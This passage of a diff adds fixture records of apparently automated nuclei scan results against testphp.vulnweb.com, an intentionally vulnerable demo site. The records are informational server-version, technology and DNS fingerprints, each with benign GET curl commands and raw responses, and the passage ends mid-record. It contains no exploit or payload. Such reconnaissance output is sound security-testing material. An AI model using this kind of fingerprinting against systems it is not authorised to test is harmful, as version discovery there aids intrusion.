"[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:34:54.374Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:48 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 223, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/E7FBAF' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:34:54.456Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/E7FBAF\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:48 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 224, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:34:54.583Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 225, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:34:54.669Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 226, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:34:54.752Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 227, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:54.842Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:45 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 228, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:31.0) Gecko/20100101 Firefox/31.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:34:54.926Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:31.0) Gecko/20100101 Firefox/31.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:47 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 229, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:55.000Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 41049\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 41049\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86393\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 230, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:55.129Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 50884\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 50884\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1791\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 231, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "dns/nameserver-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nameserver-fingerprint", + "template_id": "nameserver-fingerprint", + "matcher_name": "", + "name": "NS Record Detection", + "severity": 0, + "description": "An NS record was detected. An NS record delegates a subdomain to a set of name servers.", + "impact": null, + "remediation": null, + "extracted_results": "[\"ns2.eurodns.com.\", \"ns3.eurodns.com.\", \"ns1.eurodns.com.\", \"ns4.eurodns.com.\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:34:55.231Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 15880\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;vulnweb.com.\tIN\t NS\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 15880\n;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;vulnweb.com.\tIN\t NS\n\n;; ANSWER SECTION:\nvulnweb.com.\t21600\tIN\tNS\tns3.eurodns.com.\nvulnweb.com.\t21600\tIN\tNS\tns1.eurodns.com.\nvulnweb.com.\t21600\tIN\tNS\tns4.eurodns.com.\nvulnweb.com.\t21600\tIN\tNS\tns2.eurodns.com.\n", + "is_llm_used": false, + "tags": [ + 1, + 12 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 232, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "discovered_date": "2024-11-13T02:34:55.318Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 233, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:55.386Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 55511\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 55511\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1790\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 234, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:55.475Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 37304\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 37304\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION 